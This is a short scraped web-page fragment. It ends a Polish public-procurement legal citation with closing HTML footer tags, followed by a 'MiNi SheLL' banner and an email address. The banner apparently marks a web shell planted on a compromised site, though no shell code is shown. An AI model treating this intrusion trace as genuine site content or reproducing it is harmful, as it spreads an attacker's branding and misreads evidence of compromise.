podstawie: art. 275 pkt 1 ustawy - Usługi</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com